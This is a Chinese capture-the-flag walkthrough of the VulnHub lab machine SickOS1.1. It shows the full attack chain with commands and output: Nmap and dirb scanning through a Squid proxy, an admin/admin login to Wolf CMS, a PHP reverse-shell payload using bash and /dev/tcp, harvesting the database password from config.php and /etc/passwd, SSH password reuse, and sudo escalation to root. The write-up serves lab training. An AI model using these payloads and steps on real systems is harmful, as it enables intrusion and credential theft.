靶机
DVWA
Upload-labs
Xss-labs
Pikachu
DC-1
DC-2
DC-3
DC-4
DC-5
DC-6
DC-7
DC-8
DC-9
w1r3s
JARBAS
SickOS1.1
Prime1
-
+
首页
SickOS1.1
靶机地址:https://download.vulnhub.com/sickos/sick0s1.1.7z ## 信息搜集 1、确定靶机地址。 ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ sudo nmap -sn 192.168.186.0/24 [sudo] password for kali: Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-06 22:59 EDT Nmap scan report for 192.168.186.1 (192.168.186.1) Host is up (0.00055s latency). MAC Address: 00:50:56:C0:00:08 (VMware) Nmap scan report for 192.168.186.2 (192.168.186.2) Host is up (0.00017s latency). MAC Address: 00:50:56:EC:88:83 (VMware) Nmap scan report for 192.168.186.133 (192.168.186.133) Host is up (0.00026s latency). MAC Address: 00:0C:29:79:2C:FF (VMware) Nmap scan report for 192.168.186.254 (192.168.186.254) Host is up (0.00018s latency). MAC Address: 00:50:56:EF:45:80 (VMware) Nmap scan report for 192.168.186.128 (192.168.186.128) Host is up. Nmap done: 256 IP addresses (5 hosts up) scanned in 1.94 seconds ``` 靶机地址为192.168.186.133 2、针对目标靶机进行端口探测。 ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ sudo nmap -sT --min-rate 10000 -p- 192.168.186.133 Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-06 23:00 EDT Nmap scan report for 192.168.186.133 (192.168.186.133) Host is up (0.00043s latency). Not shown: 65532 filtered tcp ports (no-response) PORT STATE SERVICE 22/tcp open ssh 3128/tcp open squid-http 8080/tcp closed http-proxy MAC Address: 00:0C:29:79:2C:FF (VMware) Nmap done: 1 IP address (1 host up) scanned in 13.40 seconds ``` ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ sudo nmap -sU --min-rate 10000 -p- 192.168.186.133 Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-06 23:01 EDT Nmap scan report for 192.168.186.133 (192.168.186.133) Host is up (0.00039s latency). All 65535 scanned ports on 192.168.186.133 (192.168.186.133) are in ignored states. Not shown: 65535 open|filtered udp ports (no-response) MAC Address: 00:0C:29:79:2C:FF (VMware) Nmap done: 1 IP address (1 host up) scanned in 13.46 seconds ``` 开放的端口:22、3128、8080(closed) 3、探测服务服务类型与版本、操作系统类型探测、基础的脚本扫描。 ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ sudo nmap -sT -sV -sC -O -p22,3128,8080 192.168.186.133 Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-06 23:03 EDT Nmap scan report for 192.168.186.133 (192.168.186.133) Host is up (0.00035s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 1024 09:3d:29:a0:da:48:14:c1:65:14:1e:6a:6c:37:04:09 (DSA) | 2048 84:63:e9:a8:8e:99:33:48:db:f6:d5:81:ab:f2:08:ec (RSA) |_ 256 51:f6:eb:09:f6:b3:e6:91:ae:36:37:0c:c8:ee:34:27 (ECDSA) 3128/tcp open http-proxy Squid http proxy 3.1.19 |_http-server-header: squid/3.1.19 |_http-title: ERROR: The requested URL could not be retrieved 8080/tcp closed http-proxy MAC Address: 00:0C:29:79:2C:FF (VMware) Aggressive OS guesses: Linux 3.2 - 4.14 (95%), Linux 3.8 - 3.16 (95%), Linux 3.10 - 4.11 (92%), Linux 3.13 - 4.4 (92%), Linux 3.13 (91%), OpenWrt Chaos Calmer 15.05 (Linux 3.18) or Designated Driver (Linux 4.1 or 4.4) (91%), Linux 4.10 (91%), Android 5.0 - 6.0.1 (Linux 3.4) (91%), Android 8 - 9 (Linux 3.18 - 4.4) (91%), Linux 3.2 - 3.10 (91%) No exact OS matches for host (test conditions non-ideal). Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 35.10 seconds ``` 得知: - 22端口为ssh服务; - 3128端口http-server-header: squid/3.1.19。 > squid Squid-HTTP 服务通常指的是**Squid 作为 HTTP 代理服务器**提供的服务。 Squid 是一款开源的高性能代理服务器和 Web 缓存服务器,主要用于处理 HTTP、HTTPS、FTP 等协议的网络请求,其核心功能是通过缓存、转发网络请求来优化网络访问效率,并提供访问控制、内容过滤等附加功能。 ## 3128端口  给浏览器上代理。  ## 80端口 上代理之后,使用浏览器直接访问靶机IP地址。  > 目录扫描 ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ dirb http://192.168.186.133/ -p http://192.168.186.133:3128/ ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Mon Oct 6 23:14:37 2025 URL_BASE: http://192.168.186.133/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt PROXY: http://192.168.186.133:3128/ ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://192.168.186.133/ ---- + http://192.168.186.133/cgi-bin/ (CODE:403|SIZE:291) + http://192.168.186.133/connect (CODE:200|SIZE:109) + http://192.168.186.133/index (CODE:200|SIZE:21) + http://192.168.186.133/index.php (CODE:200|SIZE:21) + http://192.168.186.133/robots (CODE:200|SIZE:45) + http://192.168.186.133/robots.txt (CODE:200|SIZE:45) + http://192.168.186.133/server-status (CODE:403|SIZE:296) ----------------- END_TIME: Mon Oct 6 23:14:39 2025 DOWNLOADED: 4612 - FOUND: 7 ``` 在robots.txt下发现了wolfcms。  ## wolfcms 大致浏览之后发现该网站是刚搭建且没有过多内容。  后台地址:?/admin/login  尝试弱口令进行登录,账户与密码都是:admin  浏览后台发现,源文件中都可以添加php代码且可以上传文件,故本次选择php的反弹shell。  > PHP的反弹shell ```bash <?php shell_exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.186.128/443 0>&1'"); ?> ```  同时kali中进行监听443端口  访问该路径:`http://192.168.186.133/wolfcms/?articles.html` 上线成功  ## 提权 一般来说www-data是功能性账户。 ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ sudo nc -lnvp 443 [sudo] password for kali: listening on [any] 443 ... connect to [192.168.186.128] from (UNKNOWN) [192.168.186.133] 35783 bash: no job control in this shell www-data@SickOs:/var/www/wolfcms$ ls ls CONTRIBUTING.md README.md composer.json config.php docs favicon.ico index.php public robots.txt wolf www-data@SickOs:/var/www/wolfcms$ ``` 查看当下路径的时候发现了存在config.php文件。 ```bash <?php // Database information: // for SQLite, use sqlite:/tmp/wolf.db (SQLite 3) // The path can only be absolute path or :memory: // For more info look at: www.php.net/pdo // Database settings: define('DB_DSN', 'mysql:dbname=wolf;host=localhost;port=3306'); define('DB_USER', 'root'); define('DB_PASS', 'john@123'); define('TABLE_PREFIX', ''); // Should Wolf produce PHP error messages for debugging? define('DEBUG', false); // Should Wolf check for updates on Wolf itself and the installed plugins? define('CHECK_UPDATES', true); // The number of seconds before the check for a new Wolf version times out in ca se of problems. define('CHECK_TIMEOUT', 3); "./config.php" 85L, 3058C ``` 发现存在账户名与密码。 尝试登录22端口,登录失败。 ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ ssh root@192.168.186.133 The authenticity of host '192.168.186.133 (192.168.186.133)' can't be established. ECDSA key fingerprint is SHA256:fBxcsD9oGyzCgdxtn34OtTEDXIW4E9/RlkxombNm0y8. This key is not known by any other names. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '192.168.186.133' (ECDSA) to the list of known hosts. root@192.168.186.133's password: Permission denied, please try again. root@192.168.186.133's password: Permission denied, please try again. ``` 查看/etc/passwd文件,查看还有哪些用户。 ```bash www-data@SickOs:/var/www/wolfcms$ cat /etc/passwd cat /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh syslog:x:101:103::/home/syslog:/bin/false messagebus:x:102:105::/var/run/dbus:/bin/false whoopsie:x:103:106::/nonexistent:/bin/false landscape:x:104:109::/var/lib/landscape:/bin/false sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin sickos:x:1000:1000:sickos,,,:/home/sickos:/bin/bash mysql:x:106:114:MySQL Server,,,:/nonexistent:/bin/false john@123 ``` 注意到sickos用户是分配了/bin/bash环境的,尝试进行登录,密码使用john@123。 ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ ssh sickos@192.168.186.133 sickos@192.168.186.133's password: Welcome to Ubuntu 12.04.4 LTS (GNU/Linux 3.11.0-15-generic i686) * Documentation: https://help.ubuntu.com/ System information as of Tue Oct 7 09:06:46 IST 2025 System load: 0.0 Processes: 117 Usage of /: 4.3% of 28.42GB Users logged in: 0 Memory usage: 11% IP address for eth0: 192.168.186.133 Swap usage: 0% Graph this data and manage this system at: https://landscape.canonical.com/ 124 packages can be updated. 92 updates are security updates. New release '14.04.3 LTS' available. Run 'do-release-upgrade' to upgrade to it. Last login: Tue Sep 22 08:32:44 2015 sickos@SickOs:~$ whoami sickos sickos@SickOs:~$ id uid=1000(sickos) gid=1000(sickos) groups=1000(sickos),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),111(lpadmin),112(sambashare) ``` > sudo提权 ```bash sickos@SickOs:~$ sudo -l [sudo] password for sickos: Sorry, try again. [sudo] password for sickos: Matching Defaults entries for sickos on this host: env_reset, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User sickos may run the following commands on this host: (ALL : ALL) ALL sickos@SickOs:~$ sudo /bin/bash root@SickOs:~# cd /root root@SickOs:/root# ls a0216ea4d51874464078c618298b1367.txt root@SickOs:/root# cat ./a0216ea4d51874464078c618298b1367.txt If you are viewing this!! ROOT! You have Succesfully completed SickOS1.1. Thanks for Trying ```
毛林
2025年10月7日 11:52
转发文档
收藏文档
上一篇
下一篇
手机扫码
复制链接
手机扫一扫转发分享
复制链接
Markdown文件
PDF文档(打印)
分享
链接
类型
密码
更新密码